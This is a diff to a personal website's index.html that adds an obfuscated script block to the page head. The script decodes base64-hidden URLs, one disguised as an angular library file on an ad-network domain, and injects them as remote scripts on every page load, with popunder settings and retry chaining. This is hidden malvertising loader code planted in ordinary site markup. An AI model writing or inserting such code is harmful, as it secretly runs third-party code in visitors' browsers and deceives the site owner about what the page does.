--- a/my-website/index.html
+++ b/my-website/index.html
@@ -10,6 +10,13 @@
   <link rel="manifest" href="manifest.json">
   <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css">
   <script defer src="js/home.js"></script>
+
+  <script type="text/javascript" data-cfasync="false">
+/*<![CDATA[/* */
+(function(){var t=window,u="fd2e7978b6c222bc5c7404c985882541",d=[["siteId",801-871-805+5211481],["minBid",0],["popundersPerIP","0"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer","auto"]],l=["d3d3LmludGVsbGlnZW5jZWFkeC5jb20vbXNyTEgvdFZva2kvempzLWRhdGEtYW5ndWxhci5taW4uanM=","ZDJrbHg4N2Jnem5nY2UuY2xvdWRmcm9udC5uZXQvaWpzcGRmLm1pbi5qcw=="],i=-1,n,b,a=function(){clearTimeout(b);i++;if(l[i]&&!(1776368344000<(new Date).getTime()&&1<i)){n=t.document.createElement("script");n.type="text/javascript";n.async=!0;var k=t.document.getElementsByTagName("script")[0];n.src="https://"+atob(l[i]);n.crossOrigin="anonymous";n.onerror=a;n.onload=function(){clearTimeout(b);t[u.slice(0,16)+u.slice(0,16)]||a()};b=setTimeout(a,5E3);k.parentNode.insertBefore(n,k)}};if(!t[u]){try{Object.freeze(t[u]=d)}catch(e){}a()}})();
+/*]]>/* */
+</script>
+  
 </head>
 
 <body>
